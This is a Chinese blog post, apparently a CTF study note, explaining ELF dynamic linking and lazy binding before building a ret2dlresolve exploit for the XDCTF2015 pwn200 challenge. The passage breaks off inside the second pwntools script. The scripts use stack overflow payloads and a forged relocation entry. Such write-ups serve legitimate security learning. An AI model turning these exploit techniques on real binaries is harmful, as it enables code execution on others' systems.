<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="ret2dresolve动态链接的底层原理利用 先介绍几个段 dynamic段，这个段里保存了动态链接器需要的最基本的信息，里面记录着其他段的地址。 1234567891011121314151617181920212223Dynamic section at offset 0xf28 contains 20 entries:  标记        类型">
<meta property="og:type" content="article">
<meta property="og:title" content="ret2dl">
<meta property="og:url" content="http://example.com/2021/11/04/ret2dl/index.html">
<meta property="og:site_name" content="study">
<meta property="og:description" content="ret2dresolve动态链接的底层原理利用 先介绍几个段 dynamic段，这个段里保存了动态链接器需要的最基本的信息，里面记录着其他段的地址。 1234567891011121314151617181920212223Dynamic section at offset 0xf28 contains 20 entries:  标记        类型">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211103212842089.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211103235918868.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211104000137523.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211104000346436.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211104001037134.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211104002012359.png">
<meta property="article:published_time" content="2021-11-03T16:27:48.000Z">
<meta property="article:modified_time" content="2021-11-04T09:11:04.042Z">
<meta property="article:author" content="rootzhang">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211103212842089.png">

<link rel="canonical" href="http://example.com/2021/11/04/ret2dl/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ret2dl | study</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">study</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/11/04/ret2dl/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="rootzhang">
      <meta itemprop="description" content="我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="study">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ret2dl
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-11-04 00:27:48 / 修改时间：17:11:04" itemprop="dateCreated datePublished" datetime="2021-11-04T00:27:48+08:00">2021-11-04</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="ret2dresolve"><a href="#ret2dresolve" class="headerlink" title="ret2dresolve"></a>ret2dresolve</h2><p>动态链接的底层原理利用</p>
<p>先介绍几个段</p>
<p>dynamic段，这个段里保存了动态链接器需要的最基本的信息，里面记录着其他段的地址。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">Dynamic section at offset 0xf28 contains 20 entries:</span><br><span class="line">  标记        类型                         名称/值</span><br><span class="line"> 0x00000001 (NEEDED)                     共享库：[libc.so.6]</span><br><span class="line"> 0x0000000c (INIT)                       0x8048340</span><br><span class="line"> 0x0000000d (FINI)                       0x804861c</span><br><span class="line"> 0x6ffffef5 (GNU_HASH)                   0x80481ac</span><br><span class="line"> 0x00000005 (STRTAB)                     0x8048268</span><br><span class="line"> 0x00000006 (SYMTAB)                     0x80481d8</span><br><span class="line"> 0x0000000a (STRSZ)                      100 (bytes)</span><br><span class="line"> 0x0000000b (SYMENT)                     16 (bytes)</span><br><span class="line"> 0x00000015 (DEBUG)                      0x0</span><br><span class="line"> 0x00000003 (PLTGOT)                     0x8049ff4</span><br><span class="line"> 0x00000002 (PLTRELSZ)                   40 (bytes)</span><br><span class="line"> 0x00000014 (PLTREL)                     REL</span><br><span class="line"> 0x00000017 (JMPREL)                     0x8048318</span><br><span class="line"> 0x00000011 (REL)                        0x8048300</span><br><span class="line"> 0x00000012 (RELSZ)                      24 (bytes)</span><br><span class="line"> 0x00000013 (RELENT)                     8 (bytes)</span><br><span class="line"> 0x6ffffffe (VERNEED)                    0x80482e0</span><br><span class="line"> 0x6fffffff (VERNEEDNUM)                 1</span><br><span class="line"> 0x6ffffff0 (VERSYM)                     0x80482cc</span><br><span class="line"> 0x00000000 (NULL)                       0x0</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这个段里里记录着很段以及地址，里面我们这次要使用的段是JMPREL，即ret.plt,这个段叫做重定位表，是一个结构体数组，每个元素是一个重定位表项，一个结构体包含的内容如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> &#123;</span></span><br><span class="line">    Elf32_Addr       r_offset; 	<span class="comment">//对于可执行文件，此值为虚拟地址</span></span><br><span class="line">    Elf32_Word       r_info;    <span class="comment">//符号表索引</span></span><br><span class="line">&#125; Elf32_Rel;</span><br><span class="line">r_offset表示的是这个函数的got表的地址，r_info用于这个符号表的索引，至于怎么索引后面再继续说明。</span><br></pre></td></tr></table></figure>

<p>我们可以查看一个程序的ret.plt段里记录的内容</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">重定位节 &#x27;.rel.plt&#x27; 位于偏移量 0x318 含有 5 个条目：</span><br><span class="line"> 偏移量     信息    类型              符号值      符号名称</span><br><span class="line">0804a000  00000107 R_386_JUMP_SLOT   00000000   setbuf@GLIBC_2.0</span><br><span class="line">0804a004  00000207 R_386_JUMP_SLOT   00000000   read@GLIBC_2.0</span><br><span class="line">0804a008  00000307 R_386_JUMP_SLOT   00000000   __gmon_start__</span><br><span class="line">0804a00c  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0</span><br><span class="line">0804a010  00000507 R_386_JUMP_SLOT   00000000   write@GLIBC_2.0</span><br><span class="line">可以看见setbuf函数的重定位表项中，r_offset是0x0804a000，r_info是107，代表着setbuf函数的Got表的地址是0x0804a000</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20211103212842089.png" alt="image-20211103212842089"></p>
<p>验证可知是对的。</p>
<p>然后是.dynsym段，包含了符号重定向表，和ret.plt一样是一个结构体数组，每个函数对应一个结构体，一个结构体包含的内容如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  Elf32_Word    st_name;   <span class="comment">/* Symbol name (string tbl index) */</span></span><br><span class="line">  Elf32_Addr    st_value;  <span class="comment">/* Symbol value */</span></span><br><span class="line">  Elf32_Word    st_size;   <span class="comment">/* Symbol size */</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">char</span> st_info;   <span class="comment">/* Symbol type and binding */</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">char</span> st_other;  <span class="comment">/* Symbol visibility under glibc&gt;=2.2 */</span></span><br><span class="line">  Elf32_Section st_shndx;  <span class="comment">/* Section index */</span></span><br><span class="line">&#125; Elf32_Sym;</span><br><span class="line">里面有两个主要的变量，st_name记录着函数符号在符号表中的偏移，如果符号已经被导出，st_value记录着这个函数符号的虚拟地址。</span><br></pre></td></tr></table></figure>

<p>ret.plt表和dynsym表是一一对应的，通过ret.plt表的r_info索引到dynsym表对应的表项，索引方式是这样的，比如说setbuf的r_info是107把他向右移动八位r_info&gt;&gt;8=1,dynsym是一个数组，setbuf对应的表项就是sym[1]即sym[r_info&gt;&gt;8]</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">Symbol table &#x27;.dynsym&#x27; contains 9 entries:</span><br><span class="line">   Num:    Value  Size Type    Bind   Vis      Ndx Name</span><br><span class="line">     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND </span><br><span class="line">     1: 00000000     0 FUNC    GLOBAL DEFAULT  UND setbuf@GLIBC_2.0 (2)</span><br><span class="line">     2: 00000000     0 FUNC    GLOBAL DEFAULT  UND read@GLIBC_2.0 (2)</span><br><span class="line">     3: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__</span><br><span class="line">     4: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.0 (2)</span><br><span class="line">     5: 00000000     0 FUNC    GLOBAL DEFAULT  UND write@GLIBC_2.0 (2)</span><br><span class="line">     6: 0804a040     4 OBJECT  GLOBAL DEFAULT   25 stdout@GLIBC_2.0 (2)</span><br><span class="line">     7: 0804863c     4 OBJECT  GLOBAL DEFAULT   15 _IO_stdin_used</span><br><span class="line">     8: 0804a020     4 OBJECT  GLOBAL DEFAULT   25 stdin@GLIBC_2.0 (2)</span><br><span class="line">setbuf对应的下标是1，和上面的计算结果是一样的。</span><br></pre></td></tr></table></figure>

<p>最后是符号表.dynstr,这个记录了函数符号，该段以\x00开始和结束，每个函数符号之间也用\x00隔开，这个表是用偏移量来寻找表项的，</p>
<p>我们可以验证自己上面的过程是不是对的，dynsym的st_name记录着对应偏移量，让程序运行，找到setbuf对应的st_name</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> x/16wx 0x080481d8</span></span><br><span class="line">0x80481d8:	0x00000000	0x00000000	0x00000000	0x00000000</span><br><span class="line">0x80481e8:	0x0000003b	0x00000000	0x00000000	0x00000012</span><br><span class="line">0x80481f8:	0x0000002f	0x00000000	0x00000000	0x00000012</span><br><span class="line">0x8048208:	0x00000001	0x00000000	0x00000000	0x00000020</span><br><span class="line">一个dynsym的结构体的大小是4+4+4+1+1+2=16=0x10,一组0x10个字节是一个元素，d8是第一个元素对应下标为0，setbuf下标为1对应0x80481e8,可以看见 st_name=3b,dynstr的首地址是0x08048268,setbuf对应的符号表的表项是0x08048268+3b=0x080482a3</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> x/s 0x080482a3</span></span><br><span class="line">0x80482a3:	&quot;setbuf&quot;</span><br><span class="line">索引成功</span><br></pre></td></tr></table></figure>

<h3 id="延迟绑定全过程"><a href="#延迟绑定全过程" class="headerlink" title="延迟绑定全过程"></a>延迟绑定全过程</h3><p>以pwn200的read举例（参考ayoung佬）</p>
<p>源码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">ssize_t</span> <span class="title">sub_8048484</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">108</span>]; <span class="comment">// [esp+1Ch] [ebp-6Ch] BYREF</span></span><br><span class="line"></span><br><span class="line">  setbuf(<span class="built_in">stdin</span>, buf);</span><br><span class="line">  <span class="keyword">return</span> read(<span class="number">0</span>, buf, <span class="number">0x100</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在read处下断点，然后gdb运行，指令跳转到plt表对应位置，然后根据plt表的指令跳转到plt表指定位置</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20211103235918868.png" alt="image-20211103235918868"></p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20211104000137523.png" alt="image-20211104000137523"></p>
<p>显然plt表并未储存read函数的地址，而是先push8，然后有跳转到0x8048370,这个地址指向plt表首地址，继续跟进</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20211104000346436.png" alt="image-20211104000346436"></p>
<p>plt表的首项储存着两条指令，程序push了0x8049ff8,这是什么值呢，我们看看段表</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20211104001037134.png" alt="image-20211104001037134"></p>
<p>发现这是got表的第二项，然后第二行是got表的第三项的地址，这两条指令的意思就是把*(got+4)的地址入栈，然后程序跳到*(got+8)的位置</p>
<p>这个位置就是函数_dl_runtime_resolve的位置，也是这次漏洞利用的主角，以下就是他的源码，这个函数的主要作用就是途经ret.plt dynsym dynstr找到这个函数名的字符串，然后和动态库里储存的函数对比，找到相应函数地址，写到这个函数的got表</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line">_dl_fixup (struct link_map *l, ElfW(Word) reloc_arg)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="function"><span class="keyword">const</span> <span class="title">ElfW</span><span class="params">(Sym)</span> *<span class="keyword">const</span> symtab</span>= (<span class="keyword">const</span> <span class="keyword">void</span> *) D_PTR (l, l_info[DT_SYMTAB]);</span><br><span class="line">  <span class="comment">//获取符号表地址</span></span><br><span class="line">  </span><br><span class="line">  <span class="keyword">const</span> <span class="keyword">char</span> *strtab = (<span class="keyword">const</span> <span class="keyword">void</span> *) D_PTR (l, l_info[DT_STRTAB]);</span><br><span class="line">  <span class="comment">//获取字符串表地址</span></span><br><span class="line">  </span><br><span class="line">  <span class="keyword">const</span> PLTREL *<span class="keyword">const</span> reloc = (<span class="keyword">const</span> <span class="keyword">void</span> *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);</span><br><span class="line">  <span class="comment">//获取函数对应的重定位表结构地址</span></span><br><span class="line">  </span><br><span class="line">  <span class="function"><span class="keyword">const</span> <span class="title">ElfW</span><span class="params">(Sym)</span> *sym </span>= &amp;symtab[ELFW(R_SYM) (reloc-&gt;r_info)];</span><br><span class="line">  <span class="comment">//获取函数对应的符号表结构地址</span></span><br><span class="line">  </span><br><span class="line">  <span class="keyword">void</span> *<span class="keyword">const</span> rel_addr = (<span class="keyword">void</span> *)(l-&gt;l_addr + reloc-&gt;r_offset);</span><br><span class="line">  <span class="comment">//得到函数对应的got地址，即真实函数地址要填回的地址</span></span><br><span class="line">  </span><br><span class="line">  DL_FIXUP_VALUE_TYPE value;</span><br><span class="line"></span><br><span class="line">  assert (ELFW(R_TYPE)(reloc-&gt;r_info) == ELF_MACHINE_JMP_SLOT);</span><br><span class="line">  <span class="comment">//判断重定位表的类型，必须要为7--ELF_MACHINE_JMP_SLOT</span></span><br><span class="line">   <span class="comment">/* Look up the target symbol.  If the normal lookup rules are not</span></span><br><span class="line"><span class="comment">      used don&#x27;t look in the global scope.  */</span></span><br><span class="line">   <span class="comment">//需要绕过</span></span><br><span class="line">  <span class="keyword">if</span> (__builtin_expect (ELFW(ST_VISIBILITY) (sym-&gt;st_other), <span class="number">0</span>) == <span class="number">0</span>)</span><br><span class="line">   &#123;</span><br><span class="line">      <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">r_found_version</span> *<span class="title">version</span> =</span> <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">if</span> (l-&gt;l_info[VERSYMIDX (DT_VERSYM)] != <span class="literal">NULL</span>)</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="function"><span class="keyword">const</span> <span class="title">ElfW</span><span class="params">(Half)</span> *vernum </span>= (<span class="keyword">const</span> <span class="keyword">void</span> *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);</span><br><span class="line">    ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc-&gt;r_info)] &amp; <span class="number">0x7fff</span>;</span><br><span class="line">    version = &amp;l-&gt;l_versions[ndx];</span><br><span class="line">    <span class="keyword">if</span> (version-&gt;hash == <span class="number">0</span>)</span><br><span class="line">      version = <span class="literal">NULL</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">   ...</span><br><span class="line"></span><br><span class="line">      result = _dl_lookup_symbol_x (strtab + sym-&gt;st_name, l, &amp;sym, l-&gt;l_scope, version, ELF_RTYPE_CLASS_PLT, flags, <span class="literal">NULL</span>);</span><br><span class="line">      <span class="comment">// 接着通过strtab+sym-&gt;st_name找到符号表字符串</span></span><br><span class="line"></span><br><span class="line">  ...</span><br><span class="line">      value = DL_FIXUP_MAKE_VALUE (result,</span><br><span class="line">           sym ? (LOOKUP_VALUE_ADDRESS (result)</span><br><span class="line">            + sym-&gt;st_value) : <span class="number">0</span>);</span><br><span class="line">      <span class="comment">// value为libc基址加上要解析函数的偏移地址，也即实际地址</span></span><br><span class="line">    &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="comment">/* We already found the symbol.  The module (and therefore its load</span></span><br><span class="line"><span class="comment">   address) is also known.  */</span></span><br><span class="line">      value = DL_FIXUP_MAKE_VALUE (l, l-&gt;l_addr + sym-&gt;st_value);</span><br><span class="line">      result = l;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> elf_machine_fixup_plt (l, result, reloc, rel_addr, value);</span><br><span class="line">  <span class="comment">// 最后把value写入相应的GOT表条目rel_addr中</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个函数首先通过const PLTREL *const reloc = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);找见函数对应的重定位表，</p>
<p>这个reloc_offset就是我们刚压入栈的reloc_arg，通过段首地址和reloc_arg提供的偏移量找到对应的重定位表，然后通过 const ElfW(Sym) *sym = &amp;symtab[ELFW(R_SYM) (reloc-&gt;r_info)];函数的符号重定位表的地址</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20211104002012359.png" alt="image-20211104002012359"></p>
<p>这里r_info的最后四位必须是7，然后再通过 result = _dl_lookup_symbol_x (strtab + sym-&gt;st_name, l, &amp;sym, l-&gt;l_scope, version, ELF_RTYPE_CLASS_PLT, flags, NULL);找到函数的符号表对应的符号，最后猜测是动态库的函数和这个符号匹配，返回匹配成功的函数的偏移量，然后再加上基地址，得到函数的真实地址，把这个地址填入r_offset中（即对应的got表中）</p>
<h3 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h3><p>调用_dl_runtime_resolve函数时先压入两个参数，第一个参数是reloc_arg，就是通过这个参数找到函数的重定位表，我们可以控制这个参数，以达到控制_dl_runtime_resolve函数</p>
<p>第一步，先尝试控制reloc_arg,指向对应的ret.plt</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">sh=process(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">bss=elf.bss()</span><br><span class="line">lea_ret=<span class="number">0x08048481</span></span><br><span class="line">read=elf.plt[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">stack_size=<span class="number">0x400</span></span><br><span class="line">bss_base=bss+stack_size</span><br><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x6c</span>+p32(bss_base)+p32(read)+p32(lea_ret)+p32(<span class="number">0</span>)+p32(bss_base)+p32(<span class="number">100</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;Welcome to XDCTF2015~!\n&#x27;</span>)</span><br><span class="line">sh.sendline(payload1)</span><br><span class="line">plt_first=<span class="number">0x8048370</span></span><br><span class="line">reloc_arg=<span class="number">0x20</span></span><br><span class="line">binsh=<span class="string">&quot;bin/sh\x00&quot;</span></span><br><span class="line">bin_addr=bss_base+<span class="number">80</span></span><br><span class="line">payload2=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x4</span>+p32(plt_first)+p32(reloc_arg)+p32(<span class="number">0</span>)+p32(<span class="number">1</span>)+p32(bin_addr)+p32(<span class="built_in">len</span>(binsh))</span><br><span class="line">payload2=payload2.ljust(<span class="number">80</span>,<span class="string">&#x27;s&#x27;</span>)</span><br><span class="line">payload2=payload2+binsh</span><br><span class="line">sh.sendline(payload2)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>第二步，控制rreloc_arg,指向我们伪造的ret.plt</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">sh=process(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">bss=elf.bss()</span><br><span class="line">lea_ret=<span class="number">0x08048481</span></span><br><span class="line">read=elf.plt[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">stack_size=<span class="number">0x400</span></span><br><span class="line">bss_base=bss+stack_size</span><br><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x6c</span>+p32(bss_base)+p32(read)+p32(lea_ret)+p32(<span class="number">0</span>)+p32(bss_base)+p32(<span class="number">100</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;Welcome to XDCTF2015~!\n&#x27;</span>)</span><br><span class="line">sh.sendline(payload1)</span><br><span class="line">plt_first=<span class="number">0x8048370</span></span><br><span class="line">binsh=<span class="string">&quot;bin/sh\x00&quot;</span></span><br><span class="line">bin_addr=bss_base+<span class="number">80</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#fuck_ret</span></span><br><span class="line">ret_plt=<span class="number">0x08048318</span></span><br><span class="line">fuckret_addr=bss_base+<span class="number">28</span></span><br><span class="line">reloc_arg=fuckret_addr-ret_plt</span><br><span class="line">fuckret=p32(<span class="number">0x0804a010</span>)+p32(<span class="number">0x507</span>)</span><br><span class="line"></span><br><span class="line">payload2=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x4</span>+p32(plt_first)+p32(reloc_arg)+p32(<span class="number">0</span>)+p32(<span class="number">1</span>)+p32(bin_addr)+p32(<span 